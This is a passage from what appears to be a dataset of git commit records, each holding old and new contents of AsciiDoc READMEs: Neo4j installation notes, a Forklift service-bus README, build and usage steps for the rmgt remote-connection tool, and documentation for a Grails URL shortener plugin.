<<performance-guide>>.\n\n[[unix-console]]\n=== Unix Console Application ===\n\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate tar.gz distribution for your platform.\n2. Extract the contents of the archive, using: `tar -xf <filename>`\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Change directory to: `$NEO4J_HOME`\n * Run: `.\/bin\/neo4j console`\n4. Stop the server by typing Ctrl-C in the console.\n\n=== Linux Service ===\n\nThe `neo4j` command can also be used with `start`, `stop`, `restart` or `status` instead of `console`.\nBy using these actions, you can create a Neo4j service.\nSee the <<neo4j-manpage,neo4j man page>> for further details.\n\n[CAUTION]\nThis approach to running Neo4j as a server is deprecated.\nWe strongly advise you to run Neo4j from a package where feasible.\n\nYou can build your own `init.d` script.\nSee for instance the Linux Standard Base specification on http:\/\/refspecs.linuxfoundation.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/tocsysinit.html[system initialization], or one of the many https:\/\/gist.github.com\/chrisvest\/7673244[samples] and http:\/\/www.linux.com\/learn\/tutorials\/442412-managing-linux-daemons-with-init-scripts[tutorials].\n\n[[osx-install]]\n== Mac OSX ==\n\n=== Mac OSX Installer ===\n\n1. Download the _.dmg_ installer that you want from http:\/\/neo4j.com\/download\/.\n2. Click the downloaded installer file.\n3. Drag the Neo4j icon into the Applications folder.\n\n[TIP]\nIf you install Neo4j using the Mac installer and already have an existing instance of Neo4j the installer will ensure that both the old and new versions can co-exist on your system.\n\n=== Running Neo4j from the Terminal ===\n\nThe server can be started in the background from the terminal with the command `neo4j start`, and then stopped again with `neo4j stop`.\nThe server can also be started in the foreground with `neo4j console` -- then it's log output will be printed to the terminal.\n\nThe `neo4j-shell` command can be used to interact with Neo4j from the command line using Cypher. It will automatically connect to any\nserver that is running on localhost with the default port, otherwise it will show a help message. You can alternatively start the\nshell with an embedded Neo4j instance, by using the `-path path\/to\/data` argument -- note that only a single instance of Neo4j\ncan access the database files at a time.\n\n=== OSX Service ===\n\nUse the standard OSX system tools to create a service based on the `neo4j` command.\n\n=== A note on Java on OS X Mavericks ===\n\nUnlike previous versions, OS X Mavericks does not come with Java pre-installed. You might encounter that the first time you run Neo4j, where OS X will trigger a popup offering you to install Java SE 6.\n\nJava SE 6 is incompatible with Neo4j {neo4j-version}, so we strongly advise you to skip installing Java SE 6 if you have no other uses for it. Instead, for Neo4j {neo4j-version} we recommend you install Java SE 8 (preferred) or 7 from Oracle (http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html) as that is what we support for production use.\n\n== Multiple Server instances on one machine ==\n\nNeo4j can be set up to run as several instances on one machine, providing for instance several databases for development.\n\nFor how to set this up, see <<ha-local-cluster>>.\nJust use the Neo4j edition of your choice, follow the guide and remember to not set the servers to run in HA mode.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44e8356c84017cfe59c683757bfb9448be81d34b","subject":"- Feature update.","message":"- Feature update.\n","repos":"dcshock\/forklift,dcshock\/forklift","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Forklift\n\nThe Enterprise Service Bus that supports building and deploying microservices quickly\nand easily. Forklift makes your life easier by providing common functionality that can\nbe shared by easily by annotating your code. To see what it can do for you check out the\nfull documentation.\n\nlink:doc\/forklift.adoc[Documentation]\n\n== Releases\nlink:doc\/prev_releases.adoc[Previous Releases]\n\n* v1.0\n** Kafka Connector\n** Core no longer depends on the JMS spec libraries","old_contents":"= Forklift\n\nThe Enterprise Service Bus that supports building and deploying microservices quickly\nand easily. Forklift makes your life easier by providing common functionality that can\nbe shared by easily by annotating your code. To see what it can do for you check out the\nfull documentation.\n\nlink:doc\/forklift.adoc[Documentation]\n\n== Releases\nlink:doc\/prev_releases.adoc[Previous Releases]\n\n* v1.0\n** Kafka Connector\n** Core no longer depends on the JMS specific","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d79ef3939fa925bf22a197ccc09856ae93cccab6","subject":"Fix: \u89e3\u51b3\u5728Ubuntu\u5e73\u53f0\u7f16\u8bd1\u51fa\u9519\u7684\u95ee\u9898","message":"Fix: \u89e3\u51b3\u5728Ubuntu\u5e73\u53f0\u7f16\u8bd1\u51fa\u9519\u7684\u95ee\u9898\n","repos":"fifilyu\/rmgt,fifilyu\/rmgt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= rmgt\n\nLinux and Windows Remote Management, \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n== \u5e73\u53f0\n\u652f\u6301 Linux(SSH) \u4ee5\u53ca Windows(RDP) \u8fdc\u7a0b\u8fde\u63a5\n\n.Linux\n* \u652f\u6301\u8bc1\u4e66\u767b\u5f55\n* \u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n.Windows\n* \u4ec5\u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n== \u7f16\u8bd1\u5b89\u88c5\n=== \u5b89\u88c5 Google Test\nArchLinux:: sudo pacman -S cmake g++ gtest sshpass openssl\nUbuntu:: sudo apt-get install cmake g++ libgtest-dev libssl-dev sshpass\nUbuntu 18.04:: sudo apt-get install cmake g++ googletest libssl-dev sshpass\nCentOS:: sudo yum install epel-release && sudo yum install cmake gcc-c++ gtest-devel sshpass openssl-devel\n\n.Ubuntu\u5e73\u53f0\u9700\u8981\u624b\u52a8\u89e3\u51b3\u5355\u5143\u6d4b\u8bd5\u4f9d\u8d56\n----\nmkdir \/tmp\/gtest_build\ncd \/tmp\/gtest_build\ncmake \/usr\/src\/googletest\/googletest\/\nsudo cp libgtest.a libgtest_main.a \/usr\/local\/lib\/\ncd ~\nrm -rf \/tmp\/gtest_build\n----\n\n.\u7f16\u8bd1rmgt\n----\n$ git clone https:\/\/github.com\/fifilyu\/rmgt.git\n$ mkdir rmgt_build\n$ cd rmgt_build\n$ cmake ..\/rmgt\n$ make\n$ make test\n$ cp bin\/rmgt \u4efb\u610f\u8def\u5f84 (\u6bd4\u5982\uff0ccp bin\/rmgt \/home\/fifilyu\/bin\/rmgt)\n----\n\n[NOTE]\n\u5efa\u8bae\u5c06 rmgt \u6240\u5728\u76ee\u5f55 (\u6bd4\u5982\uff0c\/home\/fifilyu\/bin) \u52a0\u5165\u73af\u5883\u53d8\u91cf `$PATH` \uff0c\u4e5f\u53ef\u76f4\u63a5\u590d\u5236\u5230 `\/usr\/local\/bin`\uff0c\u4ee5\u4f7f\u4efb\u610f\u4f4d\u7f6e\u90fd\u80fd\u627e\u5230 `rmgt` \u547d\u4ee4\u3002\n\n== \u914d\u7f6e\u6587\u4ef6\n\u4e3b\u673a\u4fe1\u606f\u5c06\u4f1a\u4fdd\u5b58\u5230\u5f53\u524d\u7528\u6237\u4e3b\u76ee\u5f55\u4e0b\uff0c\u6587\u4ef6\u540d\u4e3a `.rmgt.conf`\u3002\u6bd4\u5982\uff0c\/home\/fifilyu\/.rmgt.conf\n\n=== \u5b89\u5168\nrmgt \u5c06\u4ee5\u660e\u6587\u4fdd\u5b58\u4e3b\u673a\u4fe1\u606f\uff0c\u5305\u62ec *\u5bc6\u7801* \u3002\n\n[WARNING]\n\u73b0\u5728\uff0c\u5982\u679c\u4f60\u5bf9\u5b89\u5168\u95ee\u9898\u975e\u5e38\u654f\u611f\uff0c\u8bf7 *\u614e\u7528* rmgt \u3002\n\n== \u8fde\u63a5 Windows \u4e3b\u673a\u7684\u5206\u8fa8\u7387\u8bbe\u7f6e\n\u9ed8\u8ba4\u5206\u8fa8\u7387\u662f 800 * 600\u3002\u5982\u679c\u9700\u8981\u91cd\u7f6e\u5206\u8fa8\u7387\uff0c\u8bf7\u76f4\u63a5\u4fee\u6539 main.cxx \u4e2d `\"-g800x600 \"` \u5373\u53ef\u3002\n\n== \u7528\u6cd5\n\n=== \u5b89\u88c5\u8f6f\u4ef6\u5305\n.\u8bf4\u660e\nopenssh:: SSH \u534f\u8bae\u5de5\u5177\u96c6\nrdesktop:: Windows \u8fdc\u7a0b\u684c\u9762\u534f\u8bae(RDP)\u5ba2\u6237\u7aef\nsshpass:: \u975e\u4ea4\u4e92\u5f0f SSH \u5bc6\u7801\u5de5\u5177\n\n.\u5b89\u88c5\u8f6f\u4ef6\nArchLinux:: sudo pacman -S openssh rdesktop sshpass\nUbuntu:: sudo apt-get install openssh-client rdesktop sshpass\nCentOS:: sudo yum install openssh-clients rdesktop sshpass (\u9700\u8981 EPEL \u6e90)\n\n=== \u589e\u52a0\u4e3b\u673a\n\n==== Linux \u5e73\u53f0\n*\u8bc1\u4e66\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx`\n\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -w password -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -w password`\n\n==== Windows \u5e73\u53f0\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx -p 3389 -u administrator -w password -d \"\u963f\u91cc\u4e91\"`\n\nor\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx`\n\n=== \u8fde\u63a5\u4e3b\u673a\n\nLinux: \u5fc5\u987b\u5728\u7ec8\u7aef\u4e0b\u6267\u884c `rmgt -c usa241`\n\nWindows: \u5728\u7ec8\u7aef\u6216\u8005 X \u684c\u9762\u4e0b\u6267\u884c `rmgt -c ali44`\n\n=== \u5220\u9664\u4e3b\u673a\n\n`rmgt -r usa241`\n\n`rmgt -r ali44`\n\n== \u4f7f\u7528\u8be6\u60c5\n\u8bf7 `rmgt -h` \u67e5\u770b\u5e2e\u52a9\n\n----\nrmgt(remote management) v2.0.1 - \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n\u7528\u6cd5 :\n\trmgt -V\n\trmgt -c <\u4e3b\u673a\u540d> [-v]\n\trmgt -l\n\trmgt -s <\u4e3b\u673a\u540d>\n\trmgt -r <\u4e3b\u673a\u540d>\n\trmgt -n <\u4e3b\u673a\u540d> -o <\u64cd\u4f5c\u7cfb\u7edf> -i <IP\u5730\u5740> -p [\u8fdc\u7a0b\u7aef\u53e3[22|3389]] -u [\u7528\u6237\u540d[root|administrator]] -w [\u5bc6\u7801] -d [\u63cf\u8ff0]\n\n\u53c2\u6570 :\n\t-c <\u4e3b\u673a\u540d>\t\t\u5c06\u8fde\u63a5\u7684\u4e3b\u673a\u540d\n\t-l \t\t\t\u663e\u793a\u6240\u6709\u4e3b\u673a\u4fe1\u606f\n\t-s <\u4e3b\u673a\u540d>\t\t\u663e\u793a\u6307\u5b9a\u4e3b\u673a\u4fe1\u606f\n\t-r <\u4e3b\u673a\u540d>\t\t\u4ece\u914d\u7f6e\u6587\u4ef6\u5220\u9664\u4e3b\u673a\n\t-n <\u4e3b\u673a\u540d>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u4e3b\u673a\u540d\n\t-o <\u64cd\u4f5c\u7cfb\u7edf>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u64cd\u4f5c\u7cfb\u7edf\uff0c\u53ef\u9009\u503c\uff1alinux windows\n\t-i <IP\u5730\u5740>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6eIP\u5730\u5740\n\t-p [\u8fdc\u7a0b\u7aef\u53e3]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u7aef\u53e3\uff0clinux \u9ed8\u8ba4\u503c\uff1a22\uff0cwindows \u9ed8\u8ba4\u503c\uff1a3389\n\t-u [\u7528\u6237\u540d]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u767b\u5f55\u7528\u6237\u540d\uff0clinux \u9ed8\u8ba4\u503c\uff1aroot\uff0cwindows \u9ed8\u8ba4\u503c\uff1aadministrator\n\t-w [\u5bc6\u7801]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u5bc6\u7801\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-d [\u63cf\u8ff0]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u63cf\u8ff0\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-h <\u663e\u793a\u5e2e\u52a9\u4fe1\u606f>\t\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\n\t-v <\u663e\u793a\u8fde\u63a5\u4fe1\u606f>\t\u663e\u793a\u8fde\u63a5\u4fe1\u606f\n\t-V <\u663e\u793a\u7248\u672c\u4fe1\u606f>\t\u663e\u793a\u7248\u672c\u4fe1\u606f\n----\n","old_contents":"= rmgt\n\nLinux and Windows Remote Management, \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n== \u5e73\u53f0\n\u652f\u6301 Linux(SSH) \u4ee5\u53ca Windows(RDP) \u8fdc\u7a0b\u8fde\u63a5\n\n.Linux\n* \u652f\u6301\u8bc1\u4e66\u767b\u5f55\n* \u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n.Windows\n* \u4ec5\u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n== \u7f16\u8bd1\u5b89\u88c5\n=== \u5b89\u88c5 Google Test\nArchLinux:: sudo pacman -S cmake g++ gtest sshpass openssl\nUbuntu:: sudo apt-get install cmake g++ libgtest-dev libssl-dev sshpass\nUbuntu 18.04:: sudo apt-get install cmake g++ googletest libssl-dev sshpass\nCentOS:: sudo yum install epel-release && sudo yum install cmake gcc-c++ gtest-devel sshpass openssl-devel\n\n----\n$ git clone https:\/\/github.com\/fifilyu\/rmgt.git\n$ mkdir rmgt_build\n$ cd rmgt_build\n$ cmake ..\/rmgt\n$ make\n$ make test\n$ cp bin\/rmgt \u4efb\u610f\u8def\u5f84 (\u6bd4\u5982\uff0ccp bin\/rmgt \/home\/fifilyu\/bin\/rmgt)\n----\n\n[NOTE]\n\u5efa\u8bae\u5c06 rmgt \u6240\u5728\u76ee\u5f55 (\u6bd4\u5982\uff0c\/home\/fifilyu\/bin) \u52a0\u5165\u73af\u5883\u53d8\u91cf `$PATH` \uff0c\u4e5f\u53ef\u76f4\u63a5\u590d\u5236\u5230 `\/usr\/local\/bin`\uff0c\u4ee5\u4f7f\u4efb\u610f\u4f4d\u7f6e\u90fd\u80fd\u627e\u5230 `rmgt` \u547d\u4ee4\u3002\n\n== \u914d\u7f6e\u6587\u4ef6\n\u4e3b\u673a\u4fe1\u606f\u5c06\u4f1a\u4fdd\u5b58\u5230\u5f53\u524d\u7528\u6237\u4e3b\u76ee\u5f55\u4e0b\uff0c\u6587\u4ef6\u540d\u4e3a `.rmgt.conf`\u3002\u6bd4\u5982\uff0c\/home\/fifilyu\/.rmgt.conf\n\n=== \u5b89\u5168\nrmgt \u5c06\u4ee5\u660e\u6587\u4fdd\u5b58\u4e3b\u673a\u4fe1\u606f\uff0c\u5305\u62ec *\u5bc6\u7801* \u3002\n\n[WARNING]\n\u73b0\u5728\uff0c\u5982\u679c\u4f60\u5bf9\u5b89\u5168\u95ee\u9898\u975e\u5e38\u654f\u611f\uff0c\u8bf7 *\u614e\u7528* rmgt \u3002\n\n== \u8fde\u63a5 Windows \u4e3b\u673a\u7684\u5206\u8fa8\u7387\u8bbe\u7f6e\n\u9ed8\u8ba4\u5206\u8fa8\u7387\u662f 800 * 600\u3002\u5982\u679c\u9700\u8981\u91cd\u7f6e\u5206\u8fa8\u7387\uff0c\u8bf7\u76f4\u63a5\u4fee\u6539 main.cxx \u4e2d `\"-g800x600 \"` \u5373\u53ef\u3002\n\n== \u7528\u6cd5\n\n=== \u5b89\u88c5\u8f6f\u4ef6\u5305\n.\u8bf4\u660e\nopenssh:: SSH \u534f\u8bae\u5de5\u5177\u96c6\nrdesktop:: Windows \u8fdc\u7a0b\u684c\u9762\u534f\u8bae(RDP)\u5ba2\u6237\u7aef\nsshpass:: \u975e\u4ea4\u4e92\u5f0f SSH \u5bc6\u7801\u5de5\u5177\n\n.\u5b89\u88c5\u8f6f\u4ef6\nArchLinux:: sudo pacman -S openssh rdesktop sshpass\nUbuntu:: sudo apt-get install openssh-client rdesktop sshpass\nCentOS:: sudo yum install openssh-clients rdesktop sshpass (\u9700\u8981 EPEL \u6e90)\n\n=== \u589e\u52a0\u4e3b\u673a\n\n==== Linux \u5e73\u53f0\n*\u8bc1\u4e66\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx`\n\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -w password -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -w password`\n\n==== Windows \u5e73\u53f0\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx -p 3389 -u administrator -w password -d \"\u963f\u91cc\u4e91\"`\n\nor\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx`\n\n=== \u8fde\u63a5\u4e3b\u673a\n\nLinux: \u5fc5\u987b\u5728\u7ec8\u7aef\u4e0b\u6267\u884c `rmgt -c usa241`\n\nWindows: \u5728\u7ec8\u7aef\u6216\u8005 X \u684c\u9762\u4e0b\u6267\u884c `rmgt -c ali44`\n\n=== \u5220\u9664\u4e3b\u673a\n\n`rmgt -r usa241`\n\n`rmgt -r ali44`\n\n== \u4f7f\u7528\u8be6\u60c5\n\u8bf7 `rmgt -h` \u67e5\u770b\u5e2e\u52a9\n\n----\nrmgt(remote management) v2.0.1 - \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n\u7528\u6cd5 :\n\trmgt -V\n\trmgt -c <\u4e3b\u673a\u540d> [-v]\n\trmgt -l\n\trmgt -s <\u4e3b\u673a\u540d>\n\trmgt -r <\u4e3b\u673a\u540d>\n\trmgt -n <\u4e3b\u673a\u540d> -o <\u64cd\u4f5c\u7cfb\u7edf> -i <IP\u5730\u5740> -p [\u8fdc\u7a0b\u7aef\u53e3[22|3389]] -u [\u7528\u6237\u540d[root|administrator]] -w [\u5bc6\u7801] -d [\u63cf\u8ff0]\n\n\u53c2\u6570 :\n\t-c <\u4e3b\u673a\u540d>\t\t\u5c06\u8fde\u63a5\u7684\u4e3b\u673a\u540d\n\t-l \t\t\t\u663e\u793a\u6240\u6709\u4e3b\u673a\u4fe1\u606f\n\t-s <\u4e3b\u673a\u540d>\t\t\u663e\u793a\u6307\u5b9a\u4e3b\u673a\u4fe1\u606f\n\t-r <\u4e3b\u673a\u540d>\t\t\u4ece\u914d\u7f6e\u6587\u4ef6\u5220\u9664\u4e3b\u673a\n\t-n <\u4e3b\u673a\u540d>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u4e3b\u673a\u540d\n\t-o <\u64cd\u4f5c\u7cfb\u7edf>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u64cd\u4f5c\u7cfb\u7edf\uff0c\u53ef\u9009\u503c\uff1alinux windows\n\t-i <IP\u5730\u5740>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6eIP\u5730\u5740\n\t-p [\u8fdc\u7a0b\u7aef\u53e3]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u7aef\u53e3\uff0clinux \u9ed8\u8ba4\u503c\uff1a22\uff0cwindows \u9ed8\u8ba4\u503c\uff1a3389\n\t-u [\u7528\u6237\u540d]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u767b\u5f55\u7528\u6237\u540d\uff0clinux \u9ed8\u8ba4\u503c\uff1aroot\uff0cwindows \u9ed8\u8ba4\u503c\uff1aadministrator\n\t-w [\u5bc6\u7801]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u5bc6\u7801\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-d [\u63cf\u8ff0]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u63cf\u8ff0\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-h <\u663e\u793a\u5e2e\u52a9\u4fe1\u606f>\t\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\n\t-v <\u663e\u793a\u8fde\u63a5\u4fe1\u606f>\t\u663e\u793a\u8fde\u63a5\u4fe1\u606f\n\t-V <\u663e\u793a\u7248\u672c\u4fe1\u606f>\t\u663e\u793a\u7248\u672c\u4fe1\u606f\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"220ad70db4c424279e224c7e4f5482f806a250d7","subject":"Added CAUTION note about case sensitive queries","message":"Added CAUTION note about case sensitive queries\n","repos":"kaleidos\/grails-url-shortener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Grails Url Shortener\n\nimage::https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/status.png[alt=\"Build Status\", link=\"https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/latest\"]\nimage::http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener.png[alt=\"Still maintained\", link=\"http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener\"]\n\nThis is a grails plugin that integrates a url shortener inside your Grails application.\n\n\n== Installation\n\nIn `BuildConfig` add the following dependency:\n\n[source, groovy]\n----\ncompile \":url-shortener:<version>\"\n----\n\n== Configuration\n\nAfter installing the plugin you have to add the following configuration to your `Config.groovy` file:\n\n[source, groovy]\n----\n\/\/ Grails-url-shortener\nshortener {\n characters = ('0'..'9') + ('a'..'h') + ('j'..'k') + ('m'..'z') + ('A'..'H') + ('J'..'K') + ('M'..'Z')\n minLength = 5\n shortDomain = http:\/\/YOUR-SHORT-DOMAIN.COM\n}\n----\n\n* `characters` the list of the valid characters for the shorted urls. In this example, the letters `i`, `l`, `I`, `L`\nare removed because they can be mix up with some typographies. You can create your custom list, for example,\nremoving the vowels.\n* `minLength` is the minimum number of characters for the shorted url.\n* `shortDomain` the short domain for your url shortener.\n\nCAUTION: If you include both lowercase and uppercase characters in the `characters` list you must make sure your\ndatabase\/table is configured to do **case sensitive** queries. Otherwise you could get the wrong URL back when\nquerying the database.\n\nNext you have to provide a unique number generator. The plugin provides an in-memory dummy implementation using\nAtomicLong available in the file https:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/src\/groovy\/net\/kaleidos\/shortener\/generator\/DummySequenceGenerator.groovy[DummySequenceGenerator].\n\nCAUTION: Please do not use this default implementation for production because the counter is reset every time\nyou start the app. You should only use this default implementation for develop o test environment.\n\nTo implement your custom unique number generator you have to create a simple Groovy or Java class that implements\nthe `net.kaleidos.shortener.SequenceGenerator` interface. For example you can use a database sequence for this number\ngenerator. The following class use a Postgresql sequence for this:\n\n[source, groovy]\n.\/src\/groovy\/com\/example\/shortener\/PostgresSequenceGenerator.groovy\n----\npackage com.example.shortener\n\nimport net.kaleidos.shortener.SequenceGenerator\nimport groovy.sql.Sql\n\nclass PostgresSequenceGenerator implements SequenceGenerator {\n def dataSource\n\n Long getNextNumber() {\n def db = new Sql(dataSource)\n return db.rows(\"SELECT nextval('seq_shorten_url_generator')\")[0]['nextval']\n }\n}\n----\n\nFinally, when you have created you custom generator you have to define the `sequenceGenerator` bean in your\n`resources.groovy` file:\n\n[source, groovy]\n----\nbeans = {\n ...\n sequenceGenerator(com.example.shortener.PostgresSequenceGenerator) {\n dataSource = ref(\"dataSource\")\n }\n ...\n}\n----\n\n=== Sequence Generator Plugin\n\nYou can also use the http:\/\/grails.org\/plugin\/sequence-generator[sequence-generator] plugin to generate sequence numbers\nfor short urls. Version 1.1+ of `sequence-generator` is compatible with version 0.2+ of `url-shortener`.\nJust add the `sequence-generator` plugin to your BuildConfig.groovy and you are ready to go.\n\nYou don't have to create a custom generator or configure a sequenceGenerator bean (section above),\nit done by the `sequence-generator` plugin.\n\n\n== Usage\n\nThe plugin provides a service `urlShortenerService` that you can inject into your grails artefacts with the following\npublic methods:\n\n* `shortUrl(String targetUrl)`: Returns a short url for the target url passed as param. If the url has already been\nshortened, the same short url is returned. Be careful because this method only returns the shortened characters for\nthe target url but not the url with the configured short domain.\n* `shortUrlFullDomain(String targetUrl)`: Returns the short url with the full domain.\n* `getTargetUrl(String shortUrl)`: Returns the target url (original url) from the short url passed as param.\nThe method also increase a counter with the number of times this url has been hit. If the short url does not exist\nthe method return null.\n\nExamples:\n\n[source, groovy]\n----\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert shortUrl.length() == 5\n\nString shortUrlWithDomain = urlShortenerService.shortUrlFullDomain(\"http:\/\/kaleidos.net\")\nassert shortUrlWithDomain.length() > 5\nassert shortUrlWithDomain.contains(\"http:\/\/\") == true\n\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert urlShortenerService.getTargetUrl(shortUrl) == \"http:\/\/kaleidos.net\"\n----\n\nThe plugin also provides a controller that can be used to redirect to the target url.\nIt is available here\nhttps:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/grails-app\/controllers\/net\/kaleidos\/shortener\/ShortenerController.groovy[ShortenerController]\nor you can implement your own custom controller.\n\n=== Tag Library\n\nThe plugin provides two GSP tags that generate short urls, `link` and `createLink`. They work as the standard Grails `link` and `createLink` but generates short urls.\n\n[source, javascript]\n----\nfunction copyShortLinkToClipboard() {\n var url = \"${shorter.createLink(controller: 'person', action: 'show', id: person.id, absolute: true)}\";\n window.prompt(\"${message(code: 'copy.to.clipboard.label', 'Copy to clipboard: Ctrl+C, Enter')}\", url);\n}\n----\n\n== Author\n\nYou can send any questions to:\n\nIv\u00e1n L\u00f3pez: lopez.ivan@gmail.com (https:\/\/twitter.com\/ilopmar[@ilopmar])\n\nCollaborations are appreciated :-)\n\n\n== Release Notes\n\n* 0.2.1 - 18\/Jan\/2015 - Fix regresion in 0.2 (See https:\/\/github.com\/lmivan\/grails-url-shortener\/issues\/6[#6])\n* 0.2 - 21\/Nov\/2014 - Added GSP tags `shorter:link` and `shorter:createLink`.\n* 0.1 - 17\/Oct\/2013 - Initial version of the plugin.\n","old_contents":"= Grails Url Shortener\n\nimage::https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/status.png[alt=\"Build Status\", link=\"https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/latest\"]\nimage::http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener.png[alt=\"Still maintained\", link=\"http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener\"]\n\nThis is a grails plugin that integrates a url shortener inside your Grails application.\n\n\n== Installation\n\nIn `BuildConfig` add the following dependency:\n\n[source, groovy]\n----\ncompile \":url-shortener:<version>\"\n----\n\n== Configuration\n\nAfter installing the plugin you have to add the following configuration to your `Config.groovy` file:\n\n[source, groovy]\n----\n\/\/ Grails-url-shortener\nshortener {\n characters = ('0'..'9') + ('a'..'h') + ('j'..'k') + ('m'..'z') + ('A'..'H') + ('J'..'K') + ('M'..'Z')\n minLength = 5\n shortDomain = http:\/\/YOUR-SHORT-DOMAIN.COM\n}\n----\n\n* `characters` the list of the valid characters for the shorted urls. In this example, the letters `i`, `l`, `I`, `L`\nare removed because they can be mix up with some typographies. You can create your custom list, for example,\nremoving the vowels.\n* `minLength` is the minimum number of characters for the shorted url.\n* `shortDomain` the short domain for your url shortener.\n\nNext you have to provide a unique number generator. The plugin provides an in-memory dummy implementation using\nAtomicLong available in the file https:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/src\/groovy\/net\/kaleidos\/shortener\/generator\/DummySequenceGenerator.groovy[DummySequenceGenerator].\n\nCAUTION: Please do not use this default implementation for production because the counter is reset every time\nyou start the app. You should only use this default implementation for develop o test environment.\n\nTo implement your custom unique number generator you have to create a simple Groovy or Java class that implements\nthe `net.kaleidos.shortener.SequenceGenerator` interface. For example you can use a database sequence for this number\ngenerator. The following class use a Postgresql sequence for this:\n\n[source, groovy]\n.\/src\/groovy\/com\/example\/shortener\/PostgresSequenceGenerator.groovy\n----\npackage com.example.shortener\n\nimport net.kaleidos.shortener.SequenceGenerator\nimport groovy.sql.Sql\n\nclass PostgresSequenceGenerator implements SequenceGenerator {\n def dataSource\n\n Long getNextNumber() {\n def db = new Sql(dataSource)\n return db.rows(\"SELECT nextval('seq_shorten_url_generator')\")[0]['nextval']\n }\n}\n----\n\nFinally, when you have created you custom generator you have to define the `sequenceGenerator` bean in your\n`resources.groovy` file:\n\n[source, groovy]\n----\nbeans = {\n ...\n sequenceGenerator(com.example.shortener.PostgresSequenceGenerator) {\n dataSource = ref(\"dataSource\")\n }\n ...\n}\n----\n\n=== Sequence Generator Plugin\n\nYou can also use the 